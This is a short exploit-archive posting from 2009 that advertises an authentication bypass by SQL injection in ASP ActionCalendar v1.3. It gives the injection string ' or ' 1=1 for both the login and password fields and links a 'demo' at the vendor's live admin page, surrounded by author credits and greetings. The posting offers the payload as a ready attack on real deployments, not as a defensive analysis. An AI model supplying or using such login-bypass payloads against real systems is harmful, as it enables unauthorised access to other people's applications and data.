[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : ASP ActionCalendar v.1.3 (Auth Bypass) SQL Injection Vulnerability
# Published : 2009-01-16
# Author : SuB-ZeRo
# Previous Title : BlogIt! (SQL/DD/XSS) Multiple Remote Vulnerabilities
# Next Title : Aj Classifieds - Real Estate v3 Remote Shell Upload Vulnerability
* Founded By : SuB-ZeRo (WaLiD)
* E-mail : Fbh@hotmail.com
* Home : WwW.dz-security.Net
* GreeTZ : D-unit & X.CJP.x & www.dz-security.net & gaza
---------------------------------------------------------
vondor : www.warrenstudios.com
---------------------------------------------------------
Exploit Auth Bypass:
login: ' or ' 1=1
passw: ' or ' 1=1
----------------------------------------------------------
-[!]
Demo :
http://www.warrenstudios.com/actioncalendar/admin.asp
----------------------------------------------------------
# www.Syue.com [2009-01-16]